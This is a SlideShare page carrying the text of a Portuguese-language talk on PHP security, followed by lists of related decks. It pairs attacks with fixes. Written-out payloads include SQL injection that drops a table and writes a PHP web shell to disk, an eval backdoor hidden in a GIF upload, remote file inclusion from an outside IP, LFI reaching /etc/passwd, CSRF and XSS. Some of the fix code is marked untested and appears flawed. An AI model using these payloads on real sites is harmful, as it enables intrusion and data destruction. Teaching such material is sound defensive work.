SlideShare uma empresa Scribd logo

Palestra de segurança em PHP - Hacking

Luis Gustavo Almeida
Luis Gustavo Almeida

Principais vulnerabilidades e correções. Injection, SQL injection, XSS, CSRF, path traversal. Programação PHP segura

Internet
1 de 47
Baixar para ler offline
Gustavo Almeida Segurança em PHP
$whois
O mantra da segurança
Baseada em erro ou booleano http://www.site.com/produto.php?id=’ or true; union all select 1,2 %23 http://www.site.com/produto.php?id=’ or true; order by 1 %23 http://www.site.com/produto.php?id=’ or true; drop table clientes; http://www.site.com/produto.php?id=’ or true; union all select 1,load_file(“/etc/apache2/sites-available/000-default.conf”) %23 http://www.site.com/produto.php?id=’ or true; union all select 1,”<pre><?php system($_GET[‘cmd’]) ?>” INTO OUTFILE “/var/www/html/pasta/backdoor.php” %23 Consegui uma backdoor : http://www.site.com/pasta/backdoor.php?cmd=ls
Injeção SQL baseada em tempo ‘or sleep(2) %23 ‘or sleep(5) %23 ‘or if(true, sleep(2),0) %23 Se o browser demorar a responder indica vulnerabilidade
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
create user ‘usuario'@'%' identified by 'senha123'; grant select,insert,update on meubd.* to ‘usuario'@'%'; Lei do menor privilégio Usuário de BD com permissão específica
Injeção em formulários de email n ou %0A mail($dest, $assunto,$msg,”From: $origem”); origem=email@email.com%0ABcc:spam@email.c om&assunto=modificado
Tirando proveito da tipagem $id_a_ser_deletado = $_GET[‘id’] $id_a_ser_deletado = (int) $_GET[‘id’] (float) (bool) (array) (object) filter_var_*** filter_sanitize_ filter_validate_ (string) $nome_a_ser_add = $_POST[‘nome’]
Tabela ascii
<?php eval($_GET[‘cmd’]); ou www.site.com/pagina.php?cmd=ls Backdoor
Formulário de arquivos imagens, pdf, txt permissão de escrita gifsicle < mygif.gif -- comment "<?php eval($_GET[‘cmd’]); ?>" > output.php3.gif www.seusite.com/img/output.php3.gif?cmd=ls
#Level 1: checar apenas a extensao .jpg,.gif,etc #Level 2: checar MIME type 'image/jpeg','image/png',etc $file_info = getimagesize($_FILES['image_file']; $file_mime = $file_info['mime']; #Level 3: Leia por exemplo os primeiros 100 bytes e analisar caracteres correspondentes via ascii #Level 4: checar por números mágicos (nao sei ainda oq é isso !!!) #################### Minha Solução ########################### #ressalvar a imagem checando se o GD retorna um resource if(is_resource($imagem)) $src = (resource) imagecreatefromstring(file_get_contents($url)); $dst = imagecreatetruecolor($width,$height); imagecopyresampled($dst,$src,0,0,0,0,$width,$height,$size[0],$size[1]); imagedestroy($src); imagepng($dst,$target_filename_here); imagedestroy($dst); Código não testado Formulário de arquivos
criptografia - rainbow tables /mostrar_pedido.php?id=12345 hash - md5, sha1 /mostrar_pedido.php?id=JHGJF765HGJHG7978HGHHJKG Posso ter todos os hashes possíveis com rainbow tables cURL: foreach($rainbows as $rainbow){ $pedidos[]=file_get_contents(‘/mostrar_pedido.php?id=’$rainbow); }
Brute Force
Brute Force - limitar a X tentativas
senhas 1-CADASTRO.php $senha = $_POST[‘senha’]; $hash_vai_para_bd = password_hash($senha, PASSWORD_BCRYPT); $sql = “Insert into clientes …”; 2-LOGIN.php $email = $_POST[‘email’]; $senha = $_POST[‘senha’]; $hash_do_bd = “select senha from clientes where email=? …….” if(password_verify($senha,$hash_do_bd)) OK
2FA
XSS (armazenado e refletido) testando com payload <script>alert(1)</script>
XSS (armazenado e refletido) site.com.br/produto.php?id=<script>alert(‘xss’)</script> site.com.br/produto.php?id=&lt;script&gt;alert(‘xss’)&lt;/script&gt; HTML < %3C URL > %3E % %25 %253C site.com.br/produto.php?id=%253Cscript%253Ealert(‘xss’)%253C/script%253E htmlspecialchars($input, ENT_QUOTES, 'UTF-8')
https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#tab=Headers
DNS
.gitignore robots.txt Index of (apache)
config.php - shoulder surfing (espiada nos ombros) define(‘LOGIN’,’fsd324A…==’); define(‘SENHA’,’ghgh24A…==’); $login=base64_decode(LOGIN); $login=base64_decode(SENHA);
CSRF POR GET OU POST <img src=’site.com/admin/del.php?id=123’> <img src=’site.com/admin/del.php?id=124’> <img src=’site.com/admin/del.php?id=125’> ou entao para quem usa MD5/SHA1 (sem salt) for($i=1;$i<=10000;$i++) echo “<img src=’site.com/admin/del.php?id=’.md5($i).”>” Funcionários logados no sistema através do controle por $_SESSION
CSRF if($_POST){ if($_SESSION[‘token’] != $_POST[‘token’]){ echo “erro csrf”;exit; } addCliente($_POST); } $_SESSION[‘token’] = random_bytes(64); <input type=”hidden” name=”token” value=”<?=$_SESSION[‘token’]?>”>
LFI - Local File Inclusion www.site.com/index.php?idioma=br $idioma = $_GET[‘idioma’]; require “../lang/$idioma.php”; www.site.com/index.php?idioma=../../etc/passwd0 Solução $idiomas = [‘en’,’br’,’es’]; if(in_array($idiomas,$idioma)) require “../lang/$idioma.php”;
RFI - Remote File Inclusion $incfile = $_REQUEST["file"]; include($incfile.".php"); www.site.com/index.php?file=http://192.23.44.55/virus
require include
Pasta Pública e Raiz Path traversal - ../../../arquivo.php (Apache ou .htaccess Options -Indexes) www.site.com/
Cookies e Sessions Usar cookies em HTTPS - Certificado ssl grátis - https://letsencrypt.org/ Cuidado com fixação de sessão site.com.br/logado.php?PHPSESSIONID=553534h5h34g5g345hg3 ● Use o parâmetro HTTPOnly para que javascript não acesse o arquivo txt do cookie ● setcookie("nome","valor","","", true); ● Use a função session_regenerate_id() após login/logout de seus usuários #PREVENTING SESSION HIJACKING #Prevents javascript XSS attacks aimed to steal the session ID ini_set('session.cookie_httponly', 1); #PREVENTING SESSION FIXATION #Session ID cannot be passed through URLs ini_set('session.use_only_cookies', 1); #Uses a secure connection (HTTPS) if possible ini_set('session.cookie_secure', 1);
Arquivos de log Que tal fazer um script que monitora 24x7 seus logs e em se tratando de algo suspeito envia um telegram para o responsável ou bloqueia no exato momento da tentativa de invasão com iptables /var/log/apache2/access.log /var/log/apache2/error.log /var/log/mysql/error.log
chmod +x /var/www/meubot.php crontab -e * * */1 * * /usr/bin/php -q /var/www/meubot.php >/dev/null 2>&1
Gustavo Almeida https://goo.gl/1DbQum github: lga37 slideshare: lga33 br.linkedin.com/in/lga37
$loop->stop();

Recomendados

Escrevendo códigos php seguros
Escrevendo códigos php segurosEscrevendo códigos php seguros
Escrevendo códigos php seguros
Douglas V. Pasqua
 
Segurança Web com PHP5
Segurança Web com PHP5Segurança Web com PHP5
Segurança Web com PHP5
Douglas V. Pasqua
 
Hello SAFE World!!!
Hello SAFE World!!!Hello SAFE World!!!
Hello SAFE World!!!
Everaldo Wanderlei Uavniczak
 
InterCon 2017 - Engenharia de segurança web: Proteja todas as camadas de seu ...
InterCon 2017 - Engenharia de segurança web: Proteja todas as camadas de seu ...InterCon 2017 - Engenharia de segurança web: Proteja todas as camadas de seu ...
InterCon 2017 - Engenharia de segurança web: Proteja todas as camadas de seu ...
iMasters
 
Segurança PHP - por Samyr Abdo
Segurança PHP - por Samyr AbdoSegurança PHP - por Samyr Abdo
Segurança PHP - por Samyr Abdo
Samyr Abdo
 
Mini Curso PHP Twig - PHP Conference 2017
Mini Curso PHP Twig - PHP Conference 2017 Mini Curso PHP Twig - PHP Conference 2017
Mini Curso PHP Twig - PHP Conference 2017
Luis Gustavo Almeida
 
Introdução ao framework CakePHP
Introdução ao framework CakePHPIntrodução ao framework CakePHP
Introdução ao framework CakePHP
igorpimentel
 
Pg2
Pg2Pg2
Pg2
csmp
 

Recomendados

Escrevendo códigos php seguros
Escrevendo códigos php segurosEscrevendo códigos php seguros
Escrevendo códigos php seguros
Douglas V. Pasqua
 
Segurança Web com PHP5
Segurança Web com PHP5Segurança Web com PHP5
Segurança Web com PHP5
Douglas V. Pasqua
 
Hello SAFE World!!!
Hello SAFE World!!!Hello SAFE World!!!
Hello SAFE World!!!
Everaldo Wanderlei Uavniczak
 
InterCon 2017 - Engenharia de segurança web: Proteja todas as camadas de seu ...
InterCon 2017 - Engenharia de segurança web: Proteja todas as camadas de seu ...InterCon 2017 - Engenharia de segurança web: Proteja todas as camadas de seu ...
InterCon 2017 - Engenharia de segurança web: Proteja todas as camadas de seu ...
iMasters
 
Segurança PHP - por Samyr Abdo
Segurança PHP - por Samyr AbdoSegurança PHP - por Samyr Abdo
Segurança PHP - por Samyr Abdo
Samyr Abdo
 
Mini Curso PHP Twig - PHP Conference 2017
Mini Curso PHP Twig - PHP Conference 2017 Mini Curso PHP Twig - PHP Conference 2017
Mini Curso PHP Twig - PHP Conference 2017
Luis Gustavo Almeida
 
Introdução ao framework CakePHP
Introdução ao framework CakePHPIntrodução ao framework CakePHP
Introdução ao framework CakePHP
igorpimentel
 
Pg2
Pg2Pg2
Pg2
csmp
 
Javascript truquesmagicos
Javascript truquesmagicosJavascript truquesmagicos
Javascript truquesmagicos
ponto hacker
 
Café com Bug - 2a Edição em 13/05/2010
Café com Bug - 2a Edição em 13/05/2010Café com Bug - 2a Edição em 13/05/2010
Café com Bug - 2a Edição em 13/05/2010
guest5542ac7
 
Bypass de token csrf na pratica secure brasil
Bypass de token csrf na pratica secure brasilBypass de token csrf na pratica secure brasil
Bypass de token csrf na pratica secure brasil
William Costa
 
Vale Security Conference - 2011 - 6 - Thiago Bordini
Vale Security Conference - 2011 - 6 - Thiago BordiniVale Security Conference - 2011 - 6 - Thiago Bordini
Vale Security Conference - 2011 - 6 - Thiago Bordini
Vale Security Conference
 
Segurança e Performance WordPress
Segurança e Performance WordPressSegurança e Performance WordPress
Segurança e Performance WordPress
Henrique Mouta
 
Segurança Web: O MMA da Tecnologia
Segurança Web: O MMA da TecnologiaSegurança Web: O MMA da Tecnologia
Segurança Web: O MMA da Tecnologia
Carlos Nilton Araújo Corrêa
 
Html, css, js, ajax
Html, css, js, ajaxHtml, css, js, ajax
Html, css, js, ajax
Wisley Pereira da Silva
 
Play Framework - FLISOL
Play Framework - FLISOLPlay Framework - FLISOL
Play Framework - FLISOL
grupoweblovers
 
Angular JS, você precisa conhecer
Angular JS, você precisa conhecerAngular JS, você precisa conhecer
Angular JS, você precisa conhecer
meet2Brains
 
Hibernate efetivo (IA-2014 / Disturbing the Mind)
Hibernate efetivo (IA-2014 / Disturbing the Mind)Hibernate efetivo (IA-2014 / Disturbing the Mind)
Hibernate efetivo (IA-2014 / Disturbing the Mind)
Rafael Ponte
 
A1 - Sql Injection na Prática Parte 01
A1 - Sql Injection na Prática Parte 01A1 - Sql Injection na Prática Parte 01
A1 - Sql Injection na Prática Parte 01
Reinaldo Junior
 
Quem tem medo do XSS ? MindThe Sec
Quem tem medo do XSS ? MindThe SecQuem tem medo do XSS ? MindThe Sec
Quem tem medo do XSS ? MindThe Sec
William Costa
 
Autenticacao em APIs com SSL
Autenticacao em APIs com SSLAutenticacao em APIs com SSL
Autenticacao em APIs com SSL
Marcelo Milhomem
 
Sql injection
Sql injectionSql injection
Sql injection
Tiago Natel de Moura
 
PHP e Segurança - Uma união possível
PHP e Segurança - Uma união possívelPHP e Segurança - Uma união possível
PHP e Segurança - Uma união possível
Er Galvão Abbott
 
Plugin zend acl
Plugin zend aclPlugin zend acl
Plugin zend acl
Douglas Lira
 
Rest Beer v2
Rest Beer v2Rest Beer v2
Rest Beer v2
Ivan Rosolen
 
Prog web 02-php-primeiros-passos
Prog web 02-php-primeiros-passosProg web 02-php-primeiros-passos
Prog web 02-php-primeiros-passosRegis Magalhães
 
E-commerce seguro com PagSeguro
E-commerce seguro com PagSeguroE-commerce seguro com PagSeguro
E-commerce seguro com PagSeguro
Elcio Ferreira
 
Windows Azure 5/8 - Recursos adicionais do Windows Azure
Windows Azure 5/8 - Recursos adicionais do Windows AzureWindows Azure 5/8 - Recursos adicionais do Windows Azure
Windows Azure 5/8 - Recursos adicionais do Windows Azure
Vitor Ciaramella
 
Segurança (in portuguese)
Segurança (in portuguese)Segurança (in portuguese)
Segurança (in portuguese)
Bruno Pedro
 
Prog web 03-php-sessoes-cookies_cabecalhos
Prog web 03-php-sessoes-cookies_cabecalhosProg web 03-php-sessoes-cookies_cabecalhos
Prog web 03-php-sessoes-cookies_cabecalhos
Regis Magalhães
 

Mais conteúdo relacionado

Mais procurados

Javascript truquesmagicos
Javascript truquesmagicosJavascript truquesmagicos
Javascript truquesmagicos
ponto hacker
 
Café com Bug - 2a Edição em 13/05/2010
Café com Bug - 2a Edição em 13/05/2010Café com Bug - 2a Edição em 13/05/2010
Café com Bug - 2a Edição em 13/05/2010
guest5542ac7
 
Bypass de token csrf na pratica secure brasil
Bypass de token csrf na pratica secure brasilBypass de token csrf na pratica secure brasil
Bypass de token csrf na pratica secure brasil
William Costa
 
Vale Security Conference - 2011 - 6 - Thiago Bordini
Vale Security Conference - 2011 - 6 - Thiago BordiniVale Security Conference - 2011 - 6 - Thiago Bordini
Vale Security Conference - 2011 - 6 - Thiago Bordini
Vale Security Conference
 
Segurança e Performance WordPress
Segurança e Performance WordPressSegurança e Performance WordPress
Segurança e Performance WordPress
Henrique Mouta
 
Segurança Web: O MMA da Tecnologia
Segurança Web: O MMA da TecnologiaSegurança Web: O MMA da Tecnologia
Segurança Web: O MMA da Tecnologia
Carlos Nilton Araújo Corrêa
 
Html, css, js, ajax
Html, css, js, ajaxHtml, css, js, ajax
Html, css, js, ajax
Wisley Pereira da Silva
 
Play Framework - FLISOL
Play Framework - FLISOLPlay Framework - FLISOL
Play Framework - FLISOL
grupoweblovers
 
Angular JS, você precisa conhecer
Angular JS, você precisa conhecerAngular JS, você precisa conhecer
Angular JS, você precisa conhecer
meet2Brains
 
Hibernate efetivo (IA-2014 / Disturbing the Mind)
Hibernate efetivo (IA-2014 / Disturbing the Mind)Hibernate efetivo (IA-2014 / Disturbing the Mind)
Hibernate efetivo (IA-2014 / Disturbing the Mind)
Rafael Ponte
 
A1 - Sql Injection na Prática Parte 01
A1 - Sql Injection na Prática Parte 01A1 - Sql Injection na Prática Parte 01
A1 - Sql Injection na Prática Parte 01
Reinaldo Junior
 
Quem tem medo do XSS ? MindThe Sec
Quem tem medo do XSS ? MindThe SecQuem tem medo do XSS ? MindThe Sec
Quem tem medo do XSS ? MindThe Sec
William Costa
 
Autenticacao em APIs com SSL
Autenticacao em APIs com SSLAutenticacao em APIs com SSL
Autenticacao em APIs com SSL
Marcelo Milhomem
 
Sql injection
Sql injectionSql injection
Sql injection
Tiago Natel de Moura
 
PHP e Segurança - Uma união possível
PHP e Segurança - Uma união possívelPHP e Segurança - Uma união possível
PHP e Segurança - Uma união possível
Er Galvão Abbott
 
Plugin zend acl
Plugin zend aclPlugin zend acl
Plugin zend acl
Douglas Lira
 
Rest Beer v2
Rest Beer v2Rest Beer v2
Rest Beer v2
Ivan Rosolen
 
Prog web 02-php-primeiros-passos
Prog web 02-php-primeiros-passosProg web 02-php-primeiros-passos
Prog web 02-php-primeiros-passosRegis Magalhães
 

Mais procurados (18)

Javascript truquesmagicos
Javascript truquesmagicosJavascript truquesmagicos
Javascript truquesmagicos
 
Café com Bug - 2a Edição em 13/05/2010
Café com Bug - 2a Edição em 13/05/2010Café com Bug - 2a Edição em 13/05/2010
Café com Bug - 2a Edição em 13/05/2010
 
Bypass de token csrf na pratica secure brasil
Bypass de token csrf na pratica secure brasilBypass de token csrf na pratica secure brasil
Bypass de token csrf na pratica secure brasil
 
Vale Security Conference - 2011 - 6 - Thiago Bordini
Vale Security Conference - 2011 - 6 - Thiago BordiniVale Security Conference - 2011 - 6 - Thiago Bordini
Vale Security Conference - 2011 - 6 - Thiago Bordini
 
Segurança e Performance WordPress
Segurança e Performance WordPressSegurança e Performance WordPress
Segurança e Performance WordPress
 
Segurança Web: O MMA da Tecnologia
Segurança Web: O MMA da TecnologiaSegurança Web: O MMA da Tecnologia
Segurança Web: O MMA da Tecnologia
 
Html, css, js, ajax
Html, css, js, ajaxHtml, css, js, ajax
Html, css, js, ajax
 
Play Framework - FLISOL
Play Framework - FLISOLPlay Framework - FLISOL
Play Framework - FLISOL
 
Angular JS, você precisa conhecer
Angular JS, você precisa conhecerAngular JS, você precisa conhecer
Angular JS, você precisa conhecer
 
Hibernate efetivo (IA-2014 / Disturbing the Mind)
Hibernate efetivo (IA-2014 / Disturbing the Mind)Hibernate efetivo (IA-2014 / Disturbing the Mind)
Hibernate efetivo (IA-2014 / Disturbing the Mind)
 
A1 - Sql Injection na Prática Parte 01
A1 - Sql Injection na Prática Parte 01A1 - Sql Injection na Prática Parte 01
A1 - Sql Injection na Prática Parte 01
 
Quem tem medo do XSS ? MindThe Sec
Quem tem medo do XSS ? MindThe SecQuem tem medo do XSS ? MindThe Sec
Quem tem medo do XSS ? MindThe Sec
 
Autenticacao em APIs com SSL
Autenticacao em APIs com SSLAutenticacao em APIs com SSL
Autenticacao em APIs com SSL
 
Sql injection
Sql injectionSql injection
Sql injection
 
PHP e Segurança - Uma união possível
PHP e Segurança - Uma união possívelPHP e Segurança - Uma união possível
PHP e Segurança - Uma união possível
 
Plugin zend acl
Plugin zend aclPlugin zend acl
Plugin zend acl
 
Rest Beer v2
Rest Beer v2Rest Beer v2
Rest Beer v2
 
Prog web 02-php-primeiros-passos
Prog web 02-php-primeiros-passosProg web 02-php-primeiros-passos
Prog web 02-php-primeiros-passos
 

Semelhante a Palestra de segurança em PHP - Hacking

E-commerce seguro com PagSeguro
E-commerce seguro com PagSeguroE-commerce seguro com PagSeguro
E-commerce seguro com PagSeguro
Elcio Ferreira
 
Windows Azure 5/8 - Recursos adicionais do Windows Azure
Windows Azure 5/8 - Recursos adicionais do Windows AzureWindows Azure 5/8 - Recursos adicionais do Windows Azure
Windows Azure 5/8 - Recursos adicionais do Windows Azure
Vitor Ciaramella
 
Segurança (in portuguese)
Segurança (in portuguese)Segurança (in portuguese)
Segurança (in portuguese)
Bruno Pedro
 
Prog web 03-php-sessoes-cookies_cabecalhos
Prog web 03-php-sessoes-cookies_cabecalhosProg web 03-php-sessoes-cookies_cabecalhos
Prog web 03-php-sessoes-cookies_cabecalhos
Regis Magalhães
 
PHP FrameWARks - FISL
PHP FrameWARks - FISLPHP FrameWARks - FISL
PHP FrameWARks - FISL
Marcio Albuquerque
 
Php 03 Sessoes Cookies Cabecalhos
Php 03 Sessoes Cookies CabecalhosPhp 03 Sessoes Cookies Cabecalhos
Php 03 Sessoes Cookies Cabecalhos
Regis Magalhães
 
Prog web 03-php-sessoes-cookies_cabecalhos
Prog web 03-php-sessoes-cookies_cabecalhosProg web 03-php-sessoes-cookies_cabecalhos
Prog web 03-php-sessoes-cookies_cabecalhos
Regis Magalhães
 
Como conectar programas em linguagem java a bases de dados
Como conectar programas em linguagem java a bases de dadosComo conectar programas em linguagem java a bases de dados
Como conectar programas em linguagem java a bases de dados
Henrique Fernandes
 
TDC2018SP | Trilha Arq PHP - Seguranca de aplicacoes web com o uso de Boas pr...
TDC2018SP | Trilha Arq PHP - Seguranca de aplicacoes web com o uso de Boas pr...TDC2018SP | Trilha Arq PHP - Seguranca de aplicacoes web com o uso de Boas pr...
TDC2018SP | Trilha Arq PHP - Seguranca de aplicacoes web com o uso de Boas pr...
tdc-globalcode
 
Tutorial.yii
Tutorial.yiiTutorial.yii
Tutorial.yii
Renato Mendes
 
Segurança PHP em 2016
Segurança PHP em 2016Segurança PHP em 2016
Segurança PHP em 2016
Er Galvão Abbott
 
Criando controle de acesso com php e my sql
Criando controle de acesso com php e my sqlCriando controle de acesso com php e my sql
Criando controle de acesso com php e my sql
Paulo Damas
 
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEEAppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE
Magno Logan
 
modernizando a arquitertura de sua aplicação
modernizando a arquitertura de sua aplicaçãomodernizando a arquitertura de sua aplicação
modernizando a arquitertura de sua aplicação
Antonio Spinelli
 
PHP ao Extremo
PHP ao ExtremoPHP ao Extremo
PHP ao Extremo
Thiago Rigo
 
Wicket 2008
Wicket 2008Wicket 2008
Wicket 2008
Claudio Miranda
 
[QANinjaConference] Automação de Testes com Codeception
[QANinjaConference] Automação de Testes com Codeception[QANinjaConference] Automação de Testes com Codeception
[QANinjaConference] Automação de Testes com Codeception
Júlio de Lima
 
Sistema php
Sistema phpSistema php
Sistema php
Nuno Bastos
 
JavaScript e JQuery para Webdesigners
JavaScript e JQuery para WebdesignersJavaScript e JQuery para Webdesigners
JavaScript e JQuery para Webdesigners
Harlley Oliveira
 
Boas práticas de Automação de Testes
Boas práticas de Automação de TestesBoas práticas de Automação de Testes
Boas práticas de Automação de Testes
Camilo Ribeiro
 

Semelhante a Palestra de segurança em PHP - Hacking (20)

E-commerce seguro com PagSeguro
E-commerce seguro com PagSeguroE-commerce seguro com PagSeguro
E-commerce seguro com PagSeguro
 
Windows Azure 5/8 - Recursos adicionais do Windows Azure
Windows Azure 5/8 - Recursos adicionais do Windows AzureWindows Azure 5/8 - Recursos adicionais do Windows Azure
Windows Azure 5/8 - Recursos adicionais do Windows Azure
 
Segurança (in portuguese)
Segurança (in portuguese)Segurança (in portuguese)
Segurança (in portuguese)
 
Prog web 03-php-sessoes-cookies_cabecalhos
Prog web 03-php-sessoes-cookies_cabecalhosProg web 03-php-sessoes-cookies_cabecalhos
Prog web 03-php-sessoes-cookies_cabecalhos
 
PHP FrameWARks - FISL
PHP FrameWARks - FISLPHP FrameWARks - FISL
PHP FrameWARks - FISL
 
Php 03 Sessoes Cookies Cabecalhos
Php 03 Sessoes Cookies CabecalhosPhp 03 Sessoes Cookies Cabecalhos
Php 03 Sessoes Cookies Cabecalhos
 
Prog web 03-php-sessoes-cookies_cabecalhos
Prog web 03-php-sessoes-cookies_cabecalhosProg web 03-php-sessoes-cookies_cabecalhos
Prog web 03-php-sessoes-cookies_cabecalhos
 
Como conectar programas em linguagem java a bases de dados
Como conectar programas em linguagem java a bases de dadosComo conectar programas em linguagem java a bases de dados
Como conectar programas em linguagem java a bases de dados
 
TDC2018SP | Trilha Arq PHP - Seguranca de aplicacoes web com o uso de Boas pr...
TDC2018SP | Trilha Arq PHP - Seguranca de aplicacoes web com o uso de Boas pr...TDC2018SP | Trilha Arq PHP - Seguranca de aplicacoes web com o uso de Boas pr...
TDC2018SP | Trilha Arq PHP - Seguranca de aplicacoes web com o uso de Boas pr...
 
Tutorial.yii
Tutorial.yiiTutorial.yii
Tutorial.yii
 
Segurança PHP em 2016
Segurança PHP em 2016Segurança PHP em 2016
Segurança PHP em 2016
 
Criando controle de acesso com php e my sql
Criando controle de acesso com php e my sqlCriando controle de acesso com php e my sql
Criando controle de acesso com php e my sql
 
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEEAppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE
 
modernizando a arquitertura de sua aplicação
modernizando a arquitertura de sua aplicaçãomodernizando a arquitertura de sua aplicação
modernizando a arquitertura de sua aplicação
 
PHP ao Extremo
PHP ao ExtremoPHP ao Extremo
PHP ao Extremo
 
Wicket 2008
Wicket 2008Wicket 2008
Wicket 2008
 
[QANinjaConference] Automação de Testes com Codeception
[QANinjaConference] Automação de Testes com Codeception[QANinjaConference] Automação de Testes com Codeception
[QANinjaConference] Automação de Testes com Codeception
 
Sistema php
Sistema phpSistema php
Sistema php
 
JavaScript e JQuery para Webdesigners
JavaScript e JQuery para WebdesignersJavaScript e JQuery para Webdesigners
JavaScript e JQuery para Webdesigners
 
Boas práticas de Automação de Testes
Boas práticas de Automação de TestesBoas práticas de Automação de Testes
Boas práticas de Automação de Testes
 

Mais de Luis Gustavo Almeida

Curso de HTML5 CSS3 e JS
Curso de HTML5 CSS3 e JSCurso de HTML5 CSS3 e JS
Curso de HTML5 CSS3 e JS
Luis Gustavo Almeida
 
Php curl - Coleta de dados na web
Php curl - Coleta de dados na webPhp curl - Coleta de dados na web
Php curl - Coleta de dados na web
Luis Gustavo Almeida
 
Geolocalização em PHP - Google Places, Maps e Routes
Geolocalização em PHP - Google Places, Maps e RoutesGeolocalização em PHP - Google Places, Maps e Routes
Geolocalização em PHP - Google Places, Maps e Routes
Luis Gustavo Almeida
 
Criando uma blockchain com PHP
Criando uma blockchain com PHPCriando uma blockchain com PHP
Criando uma blockchain com PHP
Luis Gustavo Almeida
 
Php criptomoedas e blockchain
Php criptomoedas e blockchainPhp criptomoedas e blockchain
Php criptomoedas e blockchain
Luis Gustavo Almeida
 
ReactPHP && programacao assincrona em PHP
ReactPHP && programacao assincrona em PHPReactPHP && programacao assincrona em PHP
ReactPHP && programacao assincrona em PHP
Luis Gustavo Almeida
 
Crawling - Coleta de dados na Web com PHP
Crawling - Coleta de dados na Web com PHP Crawling - Coleta de dados na Web com PHP
Crawling - Coleta de dados na Web com PHP
Luis Gustavo Almeida
 
Migrando para PHP7 - Novidades
Migrando para PHP7 - NovidadesMigrando para PHP7 - Novidades
Migrando para PHP7 - Novidades
Luis Gustavo Almeida
 

Mais de Luis Gustavo Almeida (8)

Curso de HTML5 CSS3 e JS
Curso de HTML5 CSS3 e JSCurso de HTML5 CSS3 e JS
Curso de HTML5 CSS3 e JS
 
Php curl - Coleta de dados na web
Php curl - Coleta de dados na webPhp curl - Coleta de dados na web
Php curl - Coleta de dados na web
 
Geolocalização em PHP - Google Places, Maps e Routes
Geolocalização em PHP - Google Places, Maps e RoutesGeolocalização em PHP - Google Places, Maps e Routes
Geolocalização em PHP - Google Places, Maps e Routes
 
Criando uma blockchain com PHP
Criando uma blockchain com PHPCriando uma blockchain com PHP
Criando uma blockchain com PHP
 
Php criptomoedas e blockchain
Php criptomoedas e blockchainPhp criptomoedas e blockchain
Php criptomoedas e blockchain
 
ReactPHP && programacao assincrona em PHP
ReactPHP && programacao assincrona em PHPReactPHP && programacao assincrona em PHP
ReactPHP && programacao assincrona em PHP
 
Crawling - Coleta de dados na Web com PHP
Crawling - Coleta de dados na Web com PHP Crawling - Coleta de dados na Web com PHP
Crawling - Coleta de dados na Web com PHP
 
Migrando para PHP7 - Novidades
Migrando para PHP7 - NovidadesMigrando para PHP7 - Novidades
Migrando para PHP7 - Novidades
 

Palestra de segurança em PHP - Hacking

  • 3. O mantra da segurança
  • 4.
  • 5.
  • 6. Baseada em erro ou booleano http://www.site.com/produto.php?id=’ or true; union all select 1,2 %23 http://www.site.com/produto.php?id=’ or true; order by 1 %23 http://www.site.com/produto.php?id=’ or true; drop table clientes; http://www.site.com/produto.php?id=’ or true; union all select 1,load_file(“/etc/apache2/sites-available/000-default.conf”) %23 http://www.site.com/produto.php?id=’ or true; union all select 1,”<pre><?php system($_GET[‘cmd’]) ?>” INTO OUTFILE “/var/www/html/pasta/backdoor.php” %23 Consegui uma backdoor : http://www.site.com/pasta/backdoor.php?cmd=ls
  • 7. Injeção SQL baseada em tempo ‘or sleep(2) %23 ‘or sleep(5) %23 ‘or if(true, sleep(2),0) %23 Se o browser demorar a responder indica vulnerabilidade
  • 9.
  • 10.
  • 11. create user ‘usuario'@'%' identified by 'senha123'; grant select,insert,update on meubd.* to ‘usuario'@'%'; Lei do menor privilégio Usuário de BD com permissão específica
  • 12. Injeção em formulários de email n ou %0A mail($dest, $assunto,$msg,”From: $origem”); origem=email@email.com%0ABcc:spam@email.c om&assunto=modificado
  • 13.
  • 14.
  • 15. Tirando proveito da tipagem $id_a_ser_deletado = $_GET[‘id’] $id_a_ser_deletado = (int) $_GET[‘id’] (float) (bool) (array) (object) filter_var_*** filter_sanitize_ filter_validate_ (string) $nome_a_ser_add = $_POST[‘nome’]
  • 16.
  • 19. Formulário de arquivos imagens, pdf, txt permissão de escrita gifsicle < mygif.gif -- comment "<?php eval($_GET[‘cmd’]); ?>" > output.php3.gif www.seusite.com/img/output.php3.gif?cmd=ls
  • 20. #Level 1: checar apenas a extensao .jpg,.gif,etc #Level 2: checar MIME type 'image/jpeg','image/png',etc $file_info = getimagesize($_FILES['image_file']; $file_mime = $file_info['mime']; #Level 3: Leia por exemplo os primeiros 100 bytes e analisar caracteres correspondentes via ascii #Level 4: checar por números mágicos (nao sei ainda oq é isso !!!) #################### Minha Solução ########################### #ressalvar a imagem checando se o GD retorna um resource if(is_resource($imagem)) $src = (resource) imagecreatefromstring(file_get_contents($url)); $dst = imagecreatetruecolor($width,$height); imagecopyresampled($dst,$src,0,0,0,0,$width,$height,$size[0],$size[1]); imagedestroy($src); imagepng($dst,$target_filename_here); imagedestroy($dst); Código não testado Formulário de arquivos
  • 21. criptografia - rainbow tables /mostrar_pedido.php?id=12345 hash - md5, sha1 /mostrar_pedido.php?id=JHGJF765HGJHG7978HGHHJKG Posso ter todos os hashes possíveis com rainbow tables cURL: foreach($rainbows as $rainbow){ $pedidos[]=file_get_contents(‘/mostrar_pedido.php?id=’$rainbow); }
  • 23. Brute Force - limitar a X tentativas
  • 24. senhas 1-CADASTRO.php $senha = $_POST[‘senha’]; $hash_vai_para_bd = password_hash($senha, PASSWORD_BCRYPT); $sql = “Insert into clientes …”; 2-LOGIN.php $email = $_POST[‘email’]; $senha = $_POST[‘senha’]; $hash_do_bd = “select senha from clientes where email=? …….” if(password_verify($senha,$hash_do_bd)) OK
  • 25. 2FA
  • 26. XSS (armazenado e refletido) testando com payload <script>alert(1)</script>
  • 27. XSS (armazenado e refletido) site.com.br/produto.php?id=<script>alert(‘xss’)</script> site.com.br/produto.php?id=&lt;script&gt;alert(‘xss’)&lt;/script&gt; HTML < %3C URL > %3E % %25 %253C site.com.br/produto.php?id=%253Cscript%253Ealert(‘xss’)%253C/script%253E htmlspecialchars($input, ENT_QUOTES, 'UTF-8')
  • 28.
  • 30.
  • 31. DNS
  • 32.
